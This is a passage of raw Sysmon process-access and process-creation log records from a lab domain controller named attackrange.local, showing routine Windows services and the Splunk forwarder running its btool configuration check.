Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002118Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.641{266CAFBE-647E-6064-4600-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-647E-6064-4500-00000000AE01}3988C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000002117Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.627{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647E-6064-4500-00000000AE01}3988C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002116Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.627{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-4500-00000000AE01}3988C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002115Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.627{266CAFBE-647E-6064-3F00-00000000AE01}38403844C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-647E-6064-4500-00000000AE01}3988C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14738|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002114Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.634{266CAFBE-647E-6064-4500-00000000AE01}3988C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647E-6064-3F00-00000000AE01}3840C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000002113Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002112Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002111Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002110Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002109Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002108Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002107Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002106Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002105Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002104Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002103Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002102Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002101Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002100Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002099Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002098Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002097Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002096Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002095Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.549{266CAFBE-646C-6064-1000-00000000AE01}11242508C:\Windows\system32\svchost.exe{266CAFBE-647E-6064-4400-00000000AE01}3944C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+2dbe|C:\Windows\system32\wbem\wmiprvsd.dll+155e9|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wmiprvsd.dll+fa1f|C:\Windows\system32\wbem\wmiprvsd.dll+1351d|C:\Windows\system32\wbem\wmiprvsd.dll+127f4|C:\Windows\system32\wbem\wbemcore.dll+ced2|C:\Windows\system32\wbem\wbemcore.dll+d531|C:\Windows\system32\wbem\wbemcore.dll+104fe|C:\Windows\system32\wbem\wbemcore.dll+25435|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+dc51|C:\Windows\system32\wbem\wbemcore.dll+2cfdf|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcor
e.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c 10341000x80000000000000002094Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.533{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647E-6064-4400-00000000AE01}3944C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002093Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.533{266CAFBE-647E-6064-4200-00000000AE01}38923896C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 